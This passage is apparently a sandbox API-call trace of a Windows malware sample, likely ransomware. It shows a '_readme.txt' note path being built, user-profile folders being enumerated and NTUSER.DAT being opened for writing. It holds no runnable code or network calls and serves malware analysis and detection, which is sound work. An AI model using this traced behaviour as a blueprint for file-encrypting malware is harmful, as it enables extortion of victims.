0x31ed850 [0228.086] FreeLibrary (hLibModule=0x75000000) returned 1 [0228.086] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", pMore="_readme.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned 1 [0228.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0228.087] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned 1 [0228.087] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x7c319580, ftLastAccessTime.dwHighDateTime=0x1d5fd35, ftLastWriteTime.dwLowDateTime=0x7c319580, ftLastWriteTime.dwHighDateTime=0x1d5fd35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0228.087] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x7c319580, ftLastAccessTime.dwHighDateTime=0x1d5fd35, ftLastWriteTime.dwLowDateTime=0x7c319580, ftLastWriteTime.dwHighDateTime=0x1d5fd35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.087] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0228.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b53e8 [0228.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0228.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1c) returned 0x31ed850 [0228.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5910 [0228.087] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0228.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711900 [0228.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0228.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x38) returned 0x31de170 [0228.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b53e8 [0228.088] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0228.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5910 [0228.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0228.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x54) returned 0x31d6930 [0228.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b58b8 [0228.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711900 [0228.088] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0228.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5910 [0228.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0228.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3dd8 [0228.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5860 [0228.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711898 [0228.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5808 [0228.088] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac1c60, ftLastAccessTime.dwHighDateTime=0x1d5fd35, ftLastWriteTime.dwLowDateTime=0x4ac1c60, ftLastWriteTime.dwHighDateTime=0x1d5fd35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0228.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5910 [0228.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0228.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa8) returned 0x31a4610 [0228.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b58b8 [0228.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711900 [0228.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b57b0 [0228.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5288 [0228.088] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdbd48c60, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbd48c60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0228.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5910 [0228.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x6932b0 [0228.089] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0228.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5910 [0228.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x6932b0 [0228.089] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0228.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b53e8 [0228.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x6932b0 [0228.089] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0228.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b53e8 [0228.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5288 [0228.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b57b0 [0228.089] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0228.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711898 [0228.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dda8 [0228.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x16c) returned 0x6a3b30 [0228.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b53e8 [0228.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325de10 [0228.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5288 [0228.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b58b8 [0228.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5498 [0228.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325de78 [0228.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0228.090] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325df48 [0228.090] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5180 [0228.090] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdbde11e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbde11e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0228.090] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b57b0 [0228.090] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5860 [0228.090] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5808 [0228.090] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0228.090] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711898 [0228.090] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0228.090] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x7119d0 [0228.090] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0228.090] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b57b0 [0228.090] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5860 [0228.090] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0228.092] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x254a2d90, ftLastAccessTime.dwHighDateTime=0x1d5fd35, ftLastWriteTime.dwLowDateTime=0x254a2d90, ftLastWriteTime.dwHighDateTime=0x1d5fd35, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0228.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0228.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711898 [0228.092] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT") returned=".DAT" [0228.092] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.092] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2547cc30, ftLastWriteTime.dwHighDateTime=0x1d5fd35, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0228.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0228.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711898 [0228.092] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1") returned=".LOG1" [0228.092] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28f60c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0228.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0228.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711898 [0228.092] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2") returned=".LOG2" [0228.092] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0228.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0228.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185c10 [0228.093] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned=".blf" [0228.093] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0228.093] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0228.093] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31a4298 [0228.093] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned=".regtrans-ms" [0228.093] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0228.093] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0228.093] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31a4298 [0228.093] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned=".regtrans-ms" [0228.093] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cd94e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0228.093] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0228.093] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711898 [0228.093] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini") returned=".ini" [0228.093] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdbff6520, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbff6520, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0228.093] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b57b0 [0228.093] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5860 [0228.093] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x214) returned 0x31c0d08 [0228.093] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5910 [0228.093] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711898 [0228.093] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5390 [0228.093] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5440 [0228.093] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b54f0 [0228.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0228.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711968 [0228.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dda8 [0228.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5548 [0228.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dfb0 [0228.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5230 [0228.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e018 [0228.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5758 [0228.094] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0228.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b57b0 [0228.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x6932b0 [0228.094] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0228.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b57b0 [0228.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5860 [0228.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5808 [0228.094] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0228.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x7119d0 [0228.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325df48 [0228.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0228.094] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, 